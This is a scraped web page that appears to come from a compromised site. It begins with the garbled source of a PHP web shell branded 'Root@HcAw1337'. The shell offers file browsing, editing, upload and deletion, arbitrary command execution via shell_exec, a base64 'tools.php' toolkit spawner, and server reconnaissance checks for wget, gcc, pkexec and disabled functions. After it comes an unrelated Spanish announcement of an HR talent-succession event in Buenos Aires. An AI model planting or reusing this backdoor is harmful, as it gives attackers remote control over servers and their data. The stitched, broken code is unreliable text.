🐍 Root@HcAw1337

Home: "; foreach ($pathComponents as $index => $component) { $partialPath = implode(DIRECTORY_SEPARATOR, array_slice($pathComponents, 0, $index + 1)); $partialPath = str_replace("%2F", "/", rawurlencode($partialPath)); echo "" . $component . ""; if ($index < count($pathComponents) - 1) { echo "/"; } } echo "

"; ?>
&action=createfolder"> &action=createfile"> &action=spawntools"> &action=info"> &action=upload"> &action=cmd">

Filename: $file_name

"; echo ""; } elseif ($_GET["action"] == "edit" && $file) { ?>

Filename:

".htmlspecialchars(file_get_contents($file))." "; ?>
alert('Edit $file_name success')"; echo ""; } else { echo "Edit $file_name failed"; } } } elseif ($_GET["action"] == "rename" && $file) { renames($file, $path, $file_name); } elseif ($_GET["action"] == "rename" && $folder) { renames($folder, $path, $folder_name); } elseif ($_GET["action"] == "delete" && $file) { if (unlink($file)) { echo ""; echo ""; } else { echo "Delete $file_name failed"; } } elseif ($_GET["action"] == "delete" && $folder) { if (is_dir($folder)) { if (is_writable($folder)) { @rmdir($folder); @shell_exec("rm -rf $folder"); @shell_exec("rmdir /s /q $folder"); echo ""; echo ""; } else { echo "Delete $folder_name failed"; } } } elseif ($_GET["action"] == "spawntools") { $save = saveme($path."/tools.php", base64_decode($tools)); echo "
"; if ($save) { echo ""; echo ""; } else { echo "Spawn Toolkit failed"; } echo "
"; } elseif ($_GET["action"] == "createfile") { ?>
alert('".$filename." has successfully created')"; echo ""; } else { echo "Create file failed"; } } } elseif ($_GET["action"] == "createfolder") { ?>
alert('$fname Created')"; echo ""; } else { echo "Create folder failed"; } } } elseif ($_GET["action"] == "upload") { ?>
alert('$file uploaded')"; echo ""; } else { echo "
Upload fail
"; } } } elseif ($_GET["action"] == "cmd") { ?>
".@shell_exec($cmd)."
"; } } elseif ($_GET["action"] == "info") { echo '
'; infomin(); echo '
'; } else { ?>
ItemsSizePermissionAction
$folders"; ?>--- ".hi_permission($path."/".$folders).""; ?> "; ?>
$files"; ?> ".hi_permission($path."/".$folders).""; ?> "; ?>
"; } } function saveme($name, $content) { $open = fopen($name, "w"); fwrite($open, $content); fclose($open); return $open; } function renames($item, $path, $name) { ?>
alert('$name successfully renamed')"; echo ""; } else { echo "Rename failed"; } } } function Size($path) { $bytes = sprintf('%u', filesize($path)); if ($bytes > 0) { $unit = intval(log($bytes, 1024)); $units = array('B', 'KB', 'MB', 'GB'); if (array_key_exists($unit, $units) === true) { return sprintf('%d %s', $bytes / pow(1024, $unit), $units[$unit]); } } return $bytes; } function infomin() { $curl = (function_exists("curl_version")) ? "ON" : "OFF"; $wget = (@shell_exec("wget --help")) ? "ON" : "OFF"; $python = (@shell_exec("python --help")) ? "ON" : "OFF"; $perl = (@shell_exec("perl --help")) ? "ON" : "OFF"; $ruby = (@shell_exec("ruby --help")) ? "ON" : "OFF"; $gcc = (@shell_exec("gcc --help")) ? "ON" : "OFF"; $pkexec = (@shell_exec("pkexec --version")) ? "ON" : "OFF"; $disfuncs = @ini_get("disable_functions"); $showit = (!empty($disfuncs)) ? "$disfuncs" : "NONE"; echo "
"; echo "OS : ".php_uname()."
"; echo "SERVER IP : ".$_SERVER["SERVER_ADDR"]."
"; echo "SOFTWARE : ".$_SERVER["SERVER_SOFTWARE"]."
"; echo "Disabled Functions : $showit
"; echo "CURL : $curl | WGET : $wget | PERL : $perl | RUBY : $ruby | PYTHON : $python | GCC : $gcc | PKEXEC : $pkexec"; echo "
"; } function hi_permission($items) { $perms = fileperms($items); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

Red de Formación y Desarrollo – Evaluación de Talento y Procesos de Sucesión: nuevas prácticas

Red de Formación y Desarrollo – Evaluación de Talento y Procesos de Sucesión: nuevas prácticas

Fecha/s

Viernes 12 de abril

Modalidad

Lugar

Viamonte 570, CABA.

Horarios

09.00 a 10.30 hs.

Sobre la actividad

Será un encuentro para compartir prácticas en torno a la gestión de revisión de talento. Profundizaremos en procesos clave como alcance, temporalidad, impacto tecnología aplicada, resultados, etc.

Luego dispondremos un espacio de preguntas e intercambio para enriquecer la conversación.

Speakers

Pablo Barridón

HR Talent Partner Senior Manager en Ternium

Ramiro Marchesotti

Global Talent Development Specialist en Globant

Coordina

Agustina Bilbao

Coordinadora de la Red

Completá este formulario para recibir más información sobre

Red de Formación y Desarrollo – Evaluación de Talento y Procesos de Sucesión: nuevas prácticas